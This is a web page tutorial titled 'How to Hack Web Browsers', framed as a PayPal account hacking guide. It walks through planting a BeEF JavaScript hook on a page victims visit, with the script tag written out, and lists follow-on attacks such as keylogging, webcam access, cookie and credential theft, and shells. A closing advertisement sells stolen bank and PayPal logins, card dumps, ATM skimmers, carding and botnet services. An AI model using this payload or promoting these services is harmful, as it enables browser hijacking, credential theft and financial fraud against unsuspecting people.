HOW TO HACK WEB BROWSERS [2]

HOW TO HACK WEB BROWSERS [2]

HACKING INTO PAYPAL ACCOUNTS TUTORIAL

Forwarding Ports

In this tutorial we will be using BeEF inside of our home network using localhost if you intend for users outside the network to connect back to BeEF you will need to open ports within your routers configuration.

www.portforwarding.com

Hooking a Browser

The BeEF hook is a JavaScript file it is used to hook and exploit target web browsers and acts as a C&C between the target and the attacker. BeEF is an extremely powerful tool and can gather a lot of information about the target. Once BeEF has hooked a target web browser it also allows for additional commands and modules to be executed against the target.

The example below shows a BeEF Hook running on my machine’s local IP address.

To find your local IP address you can use “ifconfig” from a new terminal. HOW TO HACK WEB BROWSERS

ifconfig
BeEF hook http://192.168.43.49:3000/hook.js.

To successfully attack a browser we will need to add a BeEF hook to a Web page that the victim will visit there are many methods of delivering a JavaScript Payload. The easiest way is to include the JavaScript hook at the Head of a web page. After the target visits the compromised web page their browser will be hooked. You will see the hooked browser’s IP address and the Operating System Platform hovering over the target hooked browser will provide information about the target system we can then click on the hooked browser and gain further information and perform further attacks on the system.

Example of BeEF JavaScript Payload

<script src= “http://192.168.43.49:3000/hook.js; type= “text/javascript” ></script>

BeEF Framework also includes some default Web Page templates that you can use.

http://localhost:3000/demos/butcher/index.html

Once the target is presented with the Web Page their browser will be hooked and appear in the Hook Browsers section of the BeEF Web GUI.

In the screenshot below, we can see BeEF has hooked a target browser, and it is online from here we can find out information such as The Browsers version plug-ins that the browser is using and various information about the target system and its software.

 

The screenshot below shows Logs from the target system such as mouse movement double clicks and other activity logs created by the target system.

 

The screenshot below shows available modules that can be used to exploit the target system such as Keyloggers and viewing Webcam or Microphone of the target browser play sounds stealing cookies and credentials and much more.

You might notice that some of the commands have different colored icons next to them. If you click back to the Getting Started tab, it will explain what each of the colors represents.

Each command module has a traffic light icon, which is used to indicate the following:


  • The command module works against the target and should be invisible to the user


  • The command module works against the target but may be visible to the user


  • The command module is yet to be verified against this target


  • The command module does not work against this target

 

BeEF also sends interactive shell commands to the target system the following screenshot below shows BeEF interactive shell.

 

BeEF can also be integrated with Metasploit for further system exploitation using modules such as browser_auto_pwn.

 

Conclusion

JavaScript can be very powerful its always wise to take precautions when visiting various websites. Even if the website is known to be trusted it can still be a threat to Watering Hole attacks.

That’s all on HOW TO HACK WEB BROWSERS [2]

WE ARE HERE FOR SERIOUS BUSINESS, WE DO NOT TOLERATE TIME WASTERS
AND BEGGARS TRYING TO BEG OR SCAM US OF OUR PRODUCTS. 
Payment is Upfront, Our services are not free

Contact us for support. We sell fresh ATM Hacking, Paypal/Cashapp accounts & Transfers, Dumps with Pin, Western Union Transfers, ATM Skimmers, Bank logins, and lots more.

We have other services like bank transfers to any bank account. We have helped change the lives of people from different continents in South America and across Europe. We can Card anytime for you and ship for half the price, Carding iPhone, Botnet setup service, Carding Classes where you will learn everything that will help you make money

Get Sameday Money Transfer Service From Our Professional Hackers

 

Leave a Reply